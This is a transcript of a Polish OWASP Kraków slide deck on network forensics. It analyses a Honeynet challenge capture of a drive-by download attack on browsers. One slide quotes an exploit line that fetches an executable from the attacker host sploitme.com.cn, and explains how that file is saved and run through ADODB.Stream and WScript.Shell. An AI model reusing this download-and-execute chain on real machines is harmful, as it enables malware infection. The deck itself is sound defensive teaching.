OWASP, Kraków, 2010-06-10 · 2020-01-17 · OWASP 5 Gość specjalny: Przykładowy incydent...
Transcript of OWASP, Kraków, 2010-06-10 · 2020-01-17 · OWASP 5 Gość specjalny: Przykładowy incydent...
![Page 1: OWASP, Kraków, 2010-06-10 · 2020-01-17 · OWASP 5 Gość specjalny: Przykładowy incydent Źródło: Honeynet Project Challenges Forensic Challenge 2010 - browsers under attack](https://reader033.fdocuments.in/reader033/viewer/2022050406/5f832eb004f804004943e284/html5/thumbnails/1.jpg)
Copyright © The OWASP FoundationPermission is granted to copy, distribute and/or modify this document under the terms of the OWASP License.
The OWASP Foundation
OWASP
http://www.owasp.org
Network ForensicCo mówią złapane pakiety?
Paweł Goleń[email protected]
2010-06-10
![Page 2: OWASP, Kraków, 2010-06-10 · 2020-01-17 · OWASP 5 Gość specjalny: Przykładowy incydent Źródło: Honeynet Project Challenges Forensic Challenge 2010 - browsers under attack](https://reader033.fdocuments.in/reader033/viewer/2022050406/5f832eb004f804004943e284/html5/thumbnails/2.jpg)
2OWASP
Zamiast agendy
Kontynuacja tematów z poprzedniego spotkaniaBędziemy badać malware, atak drive-by downloadSpojrzenie z perspektywy ruchu sieciowegoPodobna technika dla innych incydentów
Network Forensic – dlaczego na OWASP?Nie ma oprogramowania idealnegoIncydenty należy zbadać, zwłaszcza te (nie)udane
Im więcej źródeł informacji, tym lepiej– Ruch sieciowy zawiera WSZYSTKIE informacje
Dobrze wiedzieć jak TO działa Aplikacja HTTP TCP IP Ethernet → → → → W przypadku zainteresowania tematem bezpieczeństwa
![Page 3: OWASP, Kraków, 2010-06-10 · 2020-01-17 · OWASP 5 Gość specjalny: Przykładowy incydent Źródło: Honeynet Project Challenges Forensic Challenge 2010 - browsers under attack](https://reader033.fdocuments.in/reader033/viewer/2022050406/5f832eb004f804004943e284/html5/thumbnails/3.jpg)
3OWASP
The 20 Coolest Jobs in Information Security
![Page 4: OWASP, Kraków, 2010-06-10 · 2020-01-17 · OWASP 5 Gość specjalny: Przykładowy incydent Źródło: Honeynet Project Challenges Forensic Challenge 2010 - browsers under attack](https://reader033.fdocuments.in/reader033/viewer/2022050406/5f832eb004f804004943e284/html5/thumbnails/4.jpg)
4OWASP
Co będziemy robić
Ogólne zapoznanie się z sytuacjąIdentyfikacja klientów i serwerówWizualizacje ruchu w trakcie incydentuIdentyfikacja elementów atakuOdzyskiwanie plików z ruchu sieciowegoWybrane fragmenty z bliskaOgólne spojrzenie na każdy z przypadków
![Page 5: OWASP, Kraków, 2010-06-10 · 2020-01-17 · OWASP 5 Gość specjalny: Przykładowy incydent Źródło: Honeynet Project Challenges Forensic Challenge 2010 - browsers under attack](https://reader033.fdocuments.in/reader033/viewer/2022050406/5f832eb004f804004943e284/html5/thumbnails/5.jpg)
5OWASP
Gość specjalny: Przykładowy incydent
Źródło: Honeynet Project ChallengesForensic Challenge 2010 - browsers under attack
Kilka założeń na początekNie rozwiązujemy zadania (odpowiedzi na pytania)Staramy się określić co się stało, kto i jak atakowałZakładamy, że nie wiemy (prawie) NIC
Prezentacja to tylko przykładMożna spróbować innego podejściaMożna skorzystać z innych (lepszych?) narzędzi
Narzędzie nie zniweluje braku wiedzy!
![Page 6: OWASP, Kraków, 2010-06-10 · 2020-01-17 · OWASP 5 Gość specjalny: Przykładowy incydent Źródło: Honeynet Project Challenges Forensic Challenge 2010 - browsers under attack](https://reader033.fdocuments.in/reader033/viewer/2022050406/5f832eb004f804004943e284/html5/thumbnails/6.jpg)
6OWASP
Gdzie jesteśmy
Ogólne zapoznanie się z sytuacjąIdentyfikacja klientów i serwerówWizualizacje ruchu w trakcie incydentuIdentyfikacja elementów atakuOdzyskiwanie plików z ruchu sieciowegoWybrane fragmenty z bliskaOgólne spojrzenie na każdy z przypadków
![Page 7: OWASP, Kraków, 2010-06-10 · 2020-01-17 · OWASP 5 Gość specjalny: Przykładowy incydent Źródło: Honeynet Project Challenges Forensic Challenge 2010 - browsers under attack](https://reader033.fdocuments.in/reader033/viewer/2022050406/5f832eb004f804004943e284/html5/thumbnails/7.jpg)
7OWASP
Krok 1: Statystyka
![Page 8: OWASP, Kraków, 2010-06-10 · 2020-01-17 · OWASP 5 Gość specjalny: Przykładowy incydent Źródło: Honeynet Project Challenges Forensic Challenge 2010 - browsers under attack](https://reader033.fdocuments.in/reader033/viewer/2022050406/5f832eb004f804004943e284/html5/thumbnails/8.jpg)
8OWASP
Krok 2: Endpoints
![Page 9: OWASP, Kraków, 2010-06-10 · 2020-01-17 · OWASP 5 Gość specjalny: Przykładowy incydent Źródło: Honeynet Project Challenges Forensic Challenge 2010 - browsers under attack](https://reader033.fdocuments.in/reader033/viewer/2022050406/5f832eb004f804004943e284/html5/thumbnails/9.jpg)
9OWASP
Krok 3: Conversations - TCP
![Page 10: OWASP, Kraków, 2010-06-10 · 2020-01-17 · OWASP 5 Gość specjalny: Przykładowy incydent Źródło: Honeynet Project Challenges Forensic Challenge 2010 - browsers under attack](https://reader033.fdocuments.in/reader033/viewer/2022050406/5f832eb004f804004943e284/html5/thumbnails/10.jpg)
10OWASP
Krok 3: Conversations - UDP
![Page 11: OWASP, Kraków, 2010-06-10 · 2020-01-17 · OWASP 5 Gość specjalny: Przykładowy incydent Źródło: Honeynet Project Challenges Forensic Challenge 2010 - browsers under attack](https://reader033.fdocuments.in/reader033/viewer/2022050406/5f832eb004f804004943e284/html5/thumbnails/11.jpg)
11OWASP
Czego się dowiedzieliśmy
Główna aktywność na porcie 80 (HTTP?)Warto też rzucić okiem na:
DNS (wykorzystywany jako C&C) Wykorzystanie tunelowania
– Po/w protokole DNS– Po prostu po porcie 53
Doskonała metoda na płatne hotspoty
DHCP (Rouge DHCP Servers) Podmiana serwerów DNS (DNSChanger) „Wstrzyknięcie” wrogiego serwera proxy (mój pomysł :P)
– WPAD, DHCP opcja 252
Wszelkie odchylenia od „normy”
![Page 12: OWASP, Kraków, 2010-06-10 · 2020-01-17 · OWASP 5 Gość specjalny: Przykładowy incydent Źródło: Honeynet Project Challenges Forensic Challenge 2010 - browsers under attack](https://reader033.fdocuments.in/reader033/viewer/2022050406/5f832eb004f804004943e284/html5/thumbnails/12.jpg)
12OWASP
Jakie sieci?
10.0.2/24, 10.0.3/24, 10.0.4/24, 10.0.5/2410.0.x.2, 10.0.x.15 – na podstawie DHCP
192.168.1.1 – serwer DNS192.168.56/24 - ???
192.168.56.50, 192.168.56.51, 192.168.56.52209.85.128.0/17 - GOGL
209.85.227.99, 209.85.227.100, 209.85.227.10664.236.114.1 - www.honeynet.org74.125.0/16 - GOGL
74.125.77.101, 74.125.77.102
![Page 13: OWASP, Kraków, 2010-06-10 · 2020-01-17 · OWASP 5 Gość specjalny: Przykładowy incydent Źródło: Honeynet Project Challenges Forensic Challenge 2010 - browsers under attack](https://reader033.fdocuments.in/reader033/viewer/2022050406/5f832eb004f804004943e284/html5/thumbnails/13.jpg)
13OWASP
Czy możemy coś wykluczyć?
Niektóre adresy są „bardziej ryzykowne”Domeny typu *.cn, *.ruSieci należące do „egzotycznych” krajówAdresy „przypominające” inne (phishing?)
Inne adresy/sieci są bardziej zaufaneZaufane, ale nie znaczy „pewne”
Może zostać osadzony „wrogi skrypt” SQLi XSS
Nie można zakładać, że „znana” strona nie zaraża
![Page 14: OWASP, Kraków, 2010-06-10 · 2020-01-17 · OWASP 5 Gość specjalny: Przykładowy incydent Źródło: Honeynet Project Challenges Forensic Challenge 2010 - browsers under attack](https://reader033.fdocuments.in/reader033/viewer/2022050406/5f832eb004f804004943e284/html5/thumbnails/14.jpg)
14OWASP
Gdzie jesteśmy
Ogólne zapoznanie się z sytuacjąIdentyfikacja klientów i serwerówWizualizacje ruchu w trakcie incydentuIdentyfikacja elementów atakuOdzyskiwanie plików z ruchu sieciowegoWybrane fragmenty z bliskaOgólne spojrzenie na każdy z przypadków
![Page 15: OWASP, Kraków, 2010-06-10 · 2020-01-17 · OWASP 5 Gość specjalny: Przykładowy incydent Źródło: Honeynet Project Challenges Forensic Challenge 2010 - browsers under attack](https://reader033.fdocuments.in/reader033/viewer/2022050406/5f832eb004f804004943e284/html5/thumbnails/15.jpg)
15OWASP
Gdzie są klienci?
Klienci == ofiaryW zasadzie to już wiemy (Conversations - TCP)
Spróbujmy znaleźć ich przez DHCPPrzy okazji można się coś o nich dowiedzieć
![Page 16: OWASP, Kraków, 2010-06-10 · 2020-01-17 · OWASP 5 Gość specjalny: Przykładowy incydent Źródło: Honeynet Project Challenges Forensic Challenge 2010 - browsers under attack](https://reader033.fdocuments.in/reader033/viewer/2022050406/5f832eb004f804004943e284/html5/thumbnails/16.jpg)
16OWASP
Gdzie są klienci – inny sposób
Klienci łączą się z serweremWystarczy znaleźć źródła połączeń na port 80
Pierwszy element 3-way handshake SYN -> SYN/ACK -> ACK
Wireshark i display filter: tcp.flags == 0x2 and tcp.dstport == 80 (tcp.flags == 0x2 or tcp.flags == 0x12) and tcp.port == 80 http.request <- jeszcze inny sposób
Lista klientów: 10.0.2.15, 10.0.3.15, 10.0.4.15, 10.0.5.15
![Page 17: OWASP, Kraków, 2010-06-10 · 2020-01-17 · OWASP 5 Gość specjalny: Przykładowy incydent Źródło: Honeynet Project Challenges Forensic Challenge 2010 - browsers under attack](https://reader033.fdocuments.in/reader033/viewer/2022050406/5f832eb004f804004943e284/html5/thumbnails/17.jpg)
17OWASP
Ciekawostka – kiedy klienci byli aktywni
![Page 18: OWASP, Kraków, 2010-06-10 · 2020-01-17 · OWASP 5 Gość specjalny: Przykładowy incydent Źródło: Honeynet Project Challenges Forensic Challenge 2010 - browsers under attack](https://reader033.fdocuments.in/reader033/viewer/2022050406/5f832eb004f804004943e284/html5/thumbnails/18.jpg)
18OWASP
Gdzie są serwery
http://xkcd.com/742/
![Page 19: OWASP, Kraków, 2010-06-10 · 2020-01-17 · OWASP 5 Gość specjalny: Przykładowy incydent Źródło: Honeynet Project Challenges Forensic Challenge 2010 - browsers under attack](https://reader033.fdocuments.in/reader033/viewer/2022050406/5f832eb004f804004943e284/html5/thumbnails/19.jpg)
19OWASP
Zagadka – czego brakuje na tym obrazku?
![Page 20: OWASP, Kraków, 2010-06-10 · 2020-01-17 · OWASP 5 Gość specjalny: Przykładowy incydent Źródło: Honeynet Project Challenges Forensic Challenge 2010 - browsers under attack](https://reader033.fdocuments.in/reader033/viewer/2022050406/5f832eb004f804004943e284/html5/thumbnails/20.jpg)
20OWASP
Gdzie są zapytania DNS?
Brak zapytań DNS o adresy (też jest śladem!)rapidshare.com.eyu32.rushop.honeynet.sgsploitme.com.cn
Prawdopodobnie zmodyfikowany plik HostsKto i dlaczego dokonał modyfikacji
Tu prawdopodobnie na potrzeby przykładu→ Malware często modyfikuje plik Host
– Blokowanie dostępu» Samoobrona aktualizacje, narzędzia, konkurencja→
– Ale nie tylko w tym celu...
![Page 21: OWASP, Kraków, 2010-06-10 · 2020-01-17 · OWASP 5 Gość specjalny: Przykładowy incydent Źródło: Honeynet Project Challenges Forensic Challenge 2010 - browsers under attack](https://reader033.fdocuments.in/reader033/viewer/2022050406/5f832eb004f804004943e284/html5/thumbnails/21.jpg)
21OWASP
PWS-Banker.y!hosts
![Page 22: OWASP, Kraków, 2010-06-10 · 2020-01-17 · OWASP 5 Gość specjalny: Przykładowy incydent Źródło: Honeynet Project Challenges Forensic Challenge 2010 - browsers under attack](https://reader033.fdocuments.in/reader033/viewer/2022050406/5f832eb004f804004943e284/html5/thumbnails/22.jpg)
22OWASP
Co już wiemy
Klienci10.0.2.15, 10.0.3.15, 10.0.4.15, 10.0.5.15
„Dziwne” serwery, brak zapytań DNSrapidshare.com.eyu32.rushop.honeynet.sgsploitme.com.cn
„Bezpieczne” serweryPozostałe (Google, Honeynet)
Przynajmniej na potrzeby prezentacji
![Page 23: OWASP, Kraków, 2010-06-10 · 2020-01-17 · OWASP 5 Gość specjalny: Przykładowy incydent Źródło: Honeynet Project Challenges Forensic Challenge 2010 - browsers under attack](https://reader033.fdocuments.in/reader033/viewer/2022050406/5f832eb004f804004943e284/html5/thumbnails/23.jpg)
23OWASP
Gdzie jesteśmy
Ogólne zapoznanie się z sytuacjąIdentyfikacja klientów i serwerówWizualizacje ruchu w trakcie incydentuIdentyfikacja elementów atakuOdzyskiwanie plików z ruchu sieciowegoWybrane fragmenty z bliskaOgólne spojrzenie na każdy z przypadków
![Page 24: OWASP, Kraków, 2010-06-10 · 2020-01-17 · OWASP 5 Gość specjalny: Przykładowy incydent Źródło: Honeynet Project Challenges Forensic Challenge 2010 - browsers under attack](https://reader033.fdocuments.in/reader033/viewer/2022050406/5f832eb004f804004943e284/html5/thumbnails/24.jpg)
24OWASP
Ciekawostka: Wizualizacje
Netgrokhttp://www.cs.umd.edu/projects/netgrok/
WizualizacjePełnego zrzutu ruchuAktywności poszczególnych klientów (ofiar)Informację o sieciach trzeba podać
Czy to się do czegoś przydajeNa slajdach wygląda niezbyt ciekawieTrochę lepiej sprawdza się na komputerze
Identyfikacja „głośnych” węzłów w sieci
![Page 25: OWASP, Kraków, 2010-06-10 · 2020-01-17 · OWASP 5 Gość specjalny: Przykładowy incydent Źródło: Honeynet Project Challenges Forensic Challenge 2010 - browsers under attack](https://reader033.fdocuments.in/reader033/viewer/2022050406/5f832eb004f804004943e284/html5/thumbnails/25.jpg)
25OWASP
Wizualizacja 1 - całość
![Page 26: OWASP, Kraków, 2010-06-10 · 2020-01-17 · OWASP 5 Gość specjalny: Przykładowy incydent Źródło: Honeynet Project Challenges Forensic Challenge 2010 - browsers under attack](https://reader033.fdocuments.in/reader033/viewer/2022050406/5f832eb004f804004943e284/html5/thumbnails/26.jpg)
26OWASP
Wizualizacja 2 - 10.0.2.15
![Page 27: OWASP, Kraków, 2010-06-10 · 2020-01-17 · OWASP 5 Gość specjalny: Przykładowy incydent Źródło: Honeynet Project Challenges Forensic Challenge 2010 - browsers under attack](https://reader033.fdocuments.in/reader033/viewer/2022050406/5f832eb004f804004943e284/html5/thumbnails/27.jpg)
27OWASP
Wizualizacja 3 - 10.0.3.15
![Page 28: OWASP, Kraków, 2010-06-10 · 2020-01-17 · OWASP 5 Gość specjalny: Przykładowy incydent Źródło: Honeynet Project Challenges Forensic Challenge 2010 - browsers under attack](https://reader033.fdocuments.in/reader033/viewer/2022050406/5f832eb004f804004943e284/html5/thumbnails/28.jpg)
28OWASP
Wizualizacja 4 - 10.0.4.15
![Page 29: OWASP, Kraków, 2010-06-10 · 2020-01-17 · OWASP 5 Gość specjalny: Przykładowy incydent Źródło: Honeynet Project Challenges Forensic Challenge 2010 - browsers under attack](https://reader033.fdocuments.in/reader033/viewer/2022050406/5f832eb004f804004943e284/html5/thumbnails/29.jpg)
29OWASP
Wizualizacja 5 - 10.0.5.15
![Page 30: OWASP, Kraków, 2010-06-10 · 2020-01-17 · OWASP 5 Gość specjalny: Przykładowy incydent Źródło: Honeynet Project Challenges Forensic Challenge 2010 - browsers under attack](https://reader033.fdocuments.in/reader033/viewer/2022050406/5f832eb004f804004943e284/html5/thumbnails/30.jpg)
30OWASP
Gdzie jesteśmy
Ogólne zapoznanie się z sytuacjąIdentyfikacja klientów i serwerówWizualizacje ruchu w trakcie incydentuIdentyfikacja elementów atakuOdzyskiwanie plików z ruchu sieciowegoWybrane fragmenty z bliskaOgólne spojrzenie na każdy z przypadków
![Page 31: OWASP, Kraków, 2010-06-10 · 2020-01-17 · OWASP 5 Gość specjalny: Przykładowy incydent Źródło: Honeynet Project Challenges Forensic Challenge 2010 - browsers under attack](https://reader033.fdocuments.in/reader033/viewer/2022050406/5f832eb004f804004943e284/html5/thumbnails/31.jpg)
31OWASP
Jak klient trafia na stronę
![Page 32: OWASP, Kraków, 2010-06-10 · 2020-01-17 · OWASP 5 Gość specjalny: Przykładowy incydent Źródło: Honeynet Project Challenges Forensic Challenge 2010 - browsers under attack](https://reader033.fdocuments.in/reader033/viewer/2022050406/5f832eb004f804004943e284/html5/thumbnails/32.jpg)
32OWASP
A jak trafia na sploitme.com.cn
Po nagłówku Referer można ustalić gdzie następuje przekierowanieTam należy szukać osadzonego „wrogiego” skryptu
![Page 33: OWASP, Kraków, 2010-06-10 · 2020-01-17 · OWASP 5 Gość specjalny: Przykładowy incydent Źródło: Honeynet Project Challenges Forensic Challenge 2010 - browsers under attack](https://reader033.fdocuments.in/reader033/viewer/2022050406/5f832eb004f804004943e284/html5/thumbnails/33.jpg)
33OWASP
I co się dzieje na sploitme.com.cn?
![Page 34: OWASP, Kraków, 2010-06-10 · 2020-01-17 · OWASP 5 Gość specjalny: Przykładowy incydent Źródło: Honeynet Project Challenges Forensic Challenge 2010 - browsers under attack](https://reader033.fdocuments.in/reader033/viewer/2022050406/5f832eb004f804004943e284/html5/thumbnails/34.jpg)
34OWASP
I kolejna wizualizacja
Jak wygląda sekwencja zdarzeńZbudowanie drzewa odwołań
Na podstawie żądań klienta W oparciu o nagłówek Referer
Do wizualizacji posłuży Tshark Python Graphiz
A rezultat(y) wyglądają mniej więcej tak
![Page 35: OWASP, Kraków, 2010-06-10 · 2020-01-17 · OWASP 5 Gość specjalny: Przykładowy incydent Źródło: Honeynet Project Challenges Forensic Challenge 2010 - browsers under attack](https://reader033.fdocuments.in/reader033/viewer/2022050406/5f832eb004f804004943e284/html5/thumbnails/35.jpg)
35OWASP
Wizualizacja dla 10.0.2.15
![Page 36: OWASP, Kraków, 2010-06-10 · 2020-01-17 · OWASP 5 Gość specjalny: Przykładowy incydent Źródło: Honeynet Project Challenges Forensic Challenge 2010 - browsers under attack](https://reader033.fdocuments.in/reader033/viewer/2022050406/5f832eb004f804004943e284/html5/thumbnails/36.jpg)
36OWASP
Wizualizacja dla 10.0.3.15 (fragment)
![Page 37: OWASP, Kraków, 2010-06-10 · 2020-01-17 · OWASP 5 Gość specjalny: Przykładowy incydent Źródło: Honeynet Project Challenges Forensic Challenge 2010 - browsers under attack](https://reader033.fdocuments.in/reader033/viewer/2022050406/5f832eb004f804004943e284/html5/thumbnails/37.jpg)
37OWASP
Kolejne podsumowanie zebranych informacji
Jak klient trafia na stronęWpisanie adresu URL w paskuKliknięcie w mailu (phishing)
Gdzie ukryty jest „wrogi” kodDocelowe przekierowanie na sploitme.com.cnA przekierowuje z
rapidshare.com.eyu32.ru shop.honeynet.sg
![Page 38: OWASP, Kraków, 2010-06-10 · 2020-01-17 · OWASP 5 Gość specjalny: Przykładowy incydent Źródło: Honeynet Project Challenges Forensic Challenge 2010 - browsers under attack](https://reader033.fdocuments.in/reader033/viewer/2022050406/5f832eb004f804004943e284/html5/thumbnails/38.jpg)
38OWASP
Gdzie jesteśmy
Ogólne zapoznanie się z sytuacjąIdentyfikacja klientów i serwerówWizualizacje ruchu w trakcie incydentuIdentyfikacja elementów atakuOdzyskiwanie plików z ruchu sieciowegoWybrane fragmenty z bliskaOgólne spojrzenie na każdy z przypadków
![Page 39: OWASP, Kraków, 2010-06-10 · 2020-01-17 · OWASP 5 Gość specjalny: Przykładowy incydent Źródło: Honeynet Project Challenges Forensic Challenge 2010 - browsers under attack](https://reader033.fdocuments.in/reader033/viewer/2022050406/5f832eb004f804004943e284/html5/thumbnails/39.jpg)
39OWASP
Przydatne narzędzie: Network Miner
Network Miner - Network Forensic Analysis Toolhttp://networkminer.sourceforge.net/Niestety(?) – aplikacja dla Windows
W tym przypadku wykorzystany do:Odzyskiwania plików z HTTPMożna również uzyskać informacje o hostach
System operacyjny, nawiązywane sesje Odpytywane nazwy DNS, WINS,
Można uzyskać w inny sposób (Wireshark) Z Network Miner bywa wygodniej :)
![Page 40: OWASP, Kraków, 2010-06-10 · 2020-01-17 · OWASP 5 Gość specjalny: Przykładowy incydent Źródło: Honeynet Project Challenges Forensic Challenge 2010 - browsers under attack](https://reader033.fdocuments.in/reader033/viewer/2022050406/5f832eb004f804004943e284/html5/thumbnails/40.jpg)
40OWASP
Przykład: Informacje o 10.0.2.15
![Page 41: OWASP, Kraków, 2010-06-10 · 2020-01-17 · OWASP 5 Gość specjalny: Przykładowy incydent Źródło: Honeynet Project Challenges Forensic Challenge 2010 - browsers under attack](https://reader033.fdocuments.in/reader033/viewer/2022050406/5f832eb004f804004943e284/html5/thumbnails/41.jpg)
41OWASP
Przykład: Informacje o sploitme.com.cn
![Page 42: OWASP, Kraków, 2010-06-10 · 2020-01-17 · OWASP 5 Gość specjalny: Przykładowy incydent Źródło: Honeynet Project Challenges Forensic Challenge 2010 - browsers under attack](https://reader033.fdocuments.in/reader033/viewer/2022050406/5f832eb004f804004943e284/html5/thumbnails/42.jpg)
42OWASP
Przykład: Odzyskiwanie plików
![Page 43: OWASP, Kraków, 2010-06-10 · 2020-01-17 · OWASP 5 Gość specjalny: Przykładowy incydent Źródło: Honeynet Project Challenges Forensic Challenge 2010 - browsers under attack](https://reader033.fdocuments.in/reader033/viewer/2022050406/5f832eb004f804004943e284/html5/thumbnails/43.jpg)
43OWASP
Gdzie jesteśmy
Ogólne zapoznanie się z sytuacjąIdentyfikacja klientów i serwerówWizualizacje ruchu w trakcie incydentuIdentyfikacja elementów atakuOdzyskiwanie plików z ruchu sieciowegoWybrane fragmenty z bliskaOgólne spojrzenie na każdy z przypadków
![Page 44: OWASP, Kraków, 2010-06-10 · 2020-01-17 · OWASP 5 Gość specjalny: Przykładowy incydent Źródło: Honeynet Project Challenges Forensic Challenge 2010 - browsers under attack](https://reader033.fdocuments.in/reader033/viewer/2022050406/5f832eb004f804004943e284/html5/thumbnails/44.jpg)
44OWASP
Sekwencja zdarzeń dla 10.0.3.15
![Page 45: OWASP, Kraków, 2010-06-10 · 2020-01-17 · OWASP 5 Gość specjalny: Przykładowy incydent Źródło: Honeynet Project Challenges Forensic Challenge 2010 - browsers under attack](https://reader033.fdocuments.in/reader033/viewer/2022050406/5f832eb004f804004943e284/html5/thumbnails/45.jpg)
45OWASP
![Page 46: OWASP, Kraków, 2010-06-10 · 2020-01-17 · OWASP 5 Gość specjalny: Przykładowy incydent Źródło: Honeynet Project Challenges Forensic Challenge 2010 - browsers under attack](https://reader033.fdocuments.in/reader033/viewer/2022050406/5f832eb004f804004943e284/html5/thumbnails/46.jpg)
46OWASP
Co jest w rapidshare(...)/login.php
![Page 47: OWASP, Kraków, 2010-06-10 · 2020-01-17 · OWASP 5 Gość specjalny: Przykładowy incydent Źródło: Honeynet Project Challenges Forensic Challenge 2010 - browsers under attack](https://reader033.fdocuments.in/reader033/viewer/2022050406/5f832eb004f804004943e284/html5/thumbnails/47.jpg)
47OWASP
„Klasyczny” drive-by download
Na „niewinnej” stronie osadzony skryptSkrypt obfuskowany
Można odkodować, np.: Malzilla– http://malzilla.sourceforge.net/
Nie zawsze tak łatwo– Przykłady z poprzednich prezentacji na OWASP
Ostatecznie: ukryty iframePrzekierowanie na „atakującą” stronę
Tu próba wykorzystania podatności w przeglądarce Często payload „dziwnie” przypomina moduły Metasploit Payload może być uzależniony od przeglądarki
![Page 48: OWASP, Kraków, 2010-06-10 · 2020-01-17 · OWASP 5 Gość specjalny: Przykładowy incydent Źródło: Honeynet Project Challenges Forensic Challenge 2010 - browsers under attack](https://reader033.fdocuments.in/reader033/viewer/2022050406/5f832eb004f804004943e284/html5/thumbnails/48.jpg)
48OWASP
Jak atakowana jest przeglądarka (show.php)
Prawie jak w Metasploit
![Page 49: OWASP, Kraków, 2010-06-10 · 2020-01-17 · OWASP 5 Gość specjalny: Przykładowy incydent Źródło: Honeynet Project Challenges Forensic Challenge 2010 - browsers under attack](https://reader033.fdocuments.in/reader033/viewer/2022050406/5f832eb004f804004943e284/html5/thumbnails/49.jpg)
49OWASP
Jaki jest cel exploita na stronie?
Pobranie pliku wykonywalnegoPobranie za pomocą XMLHttpRequest
var urltofile='http://sploitme.com.cn/fg/load.php?e=1
Zapisanie na dysku za pomocą ADODB.StreamUruchomienie go
Uruchomienie przez WScript.Shell
![Page 50: OWASP, Kraków, 2010-06-10 · 2020-01-17 · OWASP 5 Gość specjalny: Przykładowy incydent Źródło: Honeynet Project Challenges Forensic Challenge 2010 - browsers under attack](https://reader033.fdocuments.in/reader033/viewer/2022050406/5f832eb004f804004943e284/html5/thumbnails/50.jpg)
50OWASP
Ciekawostka: atak personalizowany?
![Page 51: OWASP, Kraków, 2010-06-10 · 2020-01-17 · OWASP 5 Gość specjalny: Przykładowy incydent Źródło: Honeynet Project Challenges Forensic Challenge 2010 - browsers under attack](https://reader033.fdocuments.in/reader033/viewer/2022050406/5f832eb004f804004943e284/html5/thumbnails/51.jpg)
51OWASP
Co robi video.exe
Co robi pobrany program?
![Page 52: OWASP, Kraków, 2010-06-10 · 2020-01-17 · OWASP 5 Gość specjalny: Przykładowy incydent Źródło: Honeynet Project Challenges Forensic Challenge 2010 - browsers under attack](https://reader033.fdocuments.in/reader033/viewer/2022050406/5f832eb004f804004943e284/html5/thumbnails/52.jpg)
52OWASP
Przykładowe piaskownice
CWSandboxhttp://mwanalysis.org/http://www.sunbeltsecurity.com/sandbox/
Anubishttp://anubis.iseclab.org/
ThreatExperthttp://www.threatexpert.com/submit.aspx
Norman Sandboxhttp://www.norman.com/technology/norman_sandbox/
![Page 53: OWASP, Kraków, 2010-06-10 · 2020-01-17 · OWASP 5 Gość specjalny: Przykładowy incydent Źródło: Honeynet Project Challenges Forensic Challenge 2010 - browsers under attack](https://reader033.fdocuments.in/reader033/viewer/2022050406/5f832eb004f804004943e284/html5/thumbnails/53.jpg)
53OWASP
I ciekawostka z piaskownicy
![Page 54: OWASP, Kraków, 2010-06-10 · 2020-01-17 · OWASP 5 Gość specjalny: Przykładowy incydent Źródło: Honeynet Project Challenges Forensic Challenge 2010 - browsers under attack](https://reader033.fdocuments.in/reader033/viewer/2022050406/5f832eb004f804004943e284/html5/thumbnails/54.jpg)
54OWASP
Gdzie jesteśmy
Ogólne zapoznanie się z sytuacjąIdentyfikacja klientów i serwerówWizualizacje ruchu w trakcie incydentuIdentyfikacja elementów atakuOdzyskiwanie plików z ruchu sieciowegoWybrane fragmenty z bliskaOgólne spojrzenie na każdy z przypadków
![Page 55: OWASP, Kraków, 2010-06-10 · 2020-01-17 · OWASP 5 Gość specjalny: Przykładowy incydent Źródło: Honeynet Project Challenges Forensic Challenge 2010 - browsers under attack](https://reader033.fdocuments.in/reader033/viewer/2022050406/5f832eb004f804004943e284/html5/thumbnails/55.jpg)
55OWASP
Klient 10.0.2.15
![Page 56: OWASP, Kraków, 2010-06-10 · 2020-01-17 · OWASP 5 Gość specjalny: Przykładowy incydent Źródło: Honeynet Project Challenges Forensic Challenge 2010 - browsers under attack](https://reader033.fdocuments.in/reader033/viewer/2022050406/5f832eb004f804004943e284/html5/thumbnails/56.jpg)
56OWASP
Klient 10.0.3.15
![Page 57: OWASP, Kraków, 2010-06-10 · 2020-01-17 · OWASP 5 Gość specjalny: Przykładowy incydent Źródło: Honeynet Project Challenges Forensic Challenge 2010 - browsers under attack](https://reader033.fdocuments.in/reader033/viewer/2022050406/5f832eb004f804004943e284/html5/thumbnails/57.jpg)
57OWASP
Klient 10.0.4.15
![Page 58: OWASP, Kraków, 2010-06-10 · 2020-01-17 · OWASP 5 Gość specjalny: Przykładowy incydent Źródło: Honeynet Project Challenges Forensic Challenge 2010 - browsers under attack](https://reader033.fdocuments.in/reader033/viewer/2022050406/5f832eb004f804004943e284/html5/thumbnails/58.jpg)
58OWASP
Klient 10.0.5.15
![Page 59: OWASP, Kraków, 2010-06-10 · 2020-01-17 · OWASP 5 Gość specjalny: Przykładowy incydent Źródło: Honeynet Project Challenges Forensic Challenge 2010 - browsers under attack](https://reader033.fdocuments.in/reader033/viewer/2022050406/5f832eb004f804004943e284/html5/thumbnails/59.jpg)
59OWASP
Nagłówek User-Agent można sfałszować
![Page 60: OWASP, Kraków, 2010-06-10 · 2020-01-17 · OWASP 5 Gość specjalny: Przykładowy incydent Źródło: Honeynet Project Challenges Forensic Challenge 2010 - browsers under attack](https://reader033.fdocuments.in/reader033/viewer/2022050406/5f832eb004f804004943e284/html5/thumbnails/60.jpg)
60OWASP
Podsumowanie na koniec
Co udało się ustalićZidentyfikować klientów i serwery,Określić „atakującą” stronęOkreślić jak klienci trafiają na „atakującą” stronęOdzyskać pliki z ruchu sieciowego
Pliki HTML wraz ze skryptami wykorzystanymi w ataku Plik wykonywalny pobierany na atakowaną stację
Określić akcje wykonywane przez pobierany plikOdtworzyć prawdopodobny scenariusz zdarzeń
Co robi użytkownik, co dzieje się samo
Zauważyć fałszowany nagłówek User-Agent
![Page 61: OWASP, Kraków, 2010-06-10 · 2020-01-17 · OWASP 5 Gość specjalny: Przykładowy incydent Źródło: Honeynet Project Challenges Forensic Challenge 2010 - browsers under attack](https://reader033.fdocuments.in/reader033/viewer/2022050406/5f832eb004f804004943e284/html5/thumbnails/61.jpg)
61OWASP
Narzędzia
Wiresharkhttp://www.wireshark.org/
Network Miner, xplicohttp://networkminer.sourceforge.net/http://www.xplico.org/
Satori (ale i p0f, Ettercap, ...) http://myweb.cableone.net/xnih/
NetGrokhttp://www.cs.umd.edu/projects/netgrok/
Malzillahttp://malzilla.sourceforge.net/
![Page 62: OWASP, Kraków, 2010-06-10 · 2020-01-17 · OWASP 5 Gość specjalny: Przykładowy incydent Źródło: Honeynet Project Challenges Forensic Challenge 2010 - browsers under attack](https://reader033.fdocuments.in/reader033/viewer/2022050406/5f832eb004f804004943e284/html5/thumbnails/62.jpg)
62OWASP
Przykłady
Honeynet Project Challengeshttp://www.honeynet.org/challenges
Network Forensics Puzzle Contesthttp://forensicscontest.com/
Wireshark: Sample Captureshttp://wiki.wireshark.org/SampleCaptures
